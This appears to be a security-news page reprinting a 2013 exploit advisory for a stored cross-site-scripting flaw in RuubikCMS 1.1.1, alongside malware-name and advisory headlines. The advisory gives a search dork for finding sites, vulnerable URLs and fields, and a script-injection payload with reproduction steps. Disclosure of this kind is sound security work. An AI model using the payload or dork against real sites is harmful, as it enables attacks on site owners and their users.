The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
06/07/2013

RuubikCMS 1.1.1 - Stored XSS Vulnerability

# Exploit Title: [ruubikcms v1.1.1 Stored XSS]
# Google Dork: [powered by ruubikcms]
# Date: [2013-6-5]
# Exploit Author: [expl0i13r]
# Vendor Homepage: [http://www.ruubikcms.com/]
# Software Link: [http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip]
# Version: [1.1.1]
# Tested on: [Windows 7]
# Contact: expl0i13r@gmail.com

Description:
-------------

RuubikCMS is an open source website content management tool which is designed to be user-friendly for both the end-user and the webmaster.

ruubikcms v1.1.1 suffers from  Stored XSS vulnerability, when parsing user input to the 'name' parameter via POST method through '/ruubikcms/ruubikcms/cms/index.php'.
Attackers can exploit these weaknesses to execute arbitrary HTML and script code
in a user's browser session.

Tested on : Windows 7
Browsers  : Chrome,Internet Explorer, Firefox


POC of the vulnerabilities :
-----------------------------

Stored XSS Vulnerable URL's
----------------------------

http://127.0.0.1/ruubikcms/ruubikcms/cms/index.php            [vulnerable : name]
http://127.0.0.1/ruubikcms/ruubikcms/cms/extranet.php?p=member-area [vulnerable : name]
http://127.0.0.1/ruubikcms/ruubikcms/cms/sitesetup.php            [Vulnerable : name , siteroot]
http://127.0.0.1/ruubikcms/ruubikcms/cms/users.php?role=5&;p=test    [Vulnerable : firstname , lastname]

p@yl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script>


Example:

Pagemanagement > Page name

1. Enter pAyl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script> in:
   "Page management" > "Page name" textbox

2. Refresh page and click on Free Pages and p0p up will come.

3. Also Click on tab "News" which will load our injected XSS code , it will be available in drop down menu : News > Link to page (optional)


# blackpentesters.blogspot.com [2013-6-5]
# infotech-knowledge.blogspot.com

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit &quot;mbae.sys&quot;

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015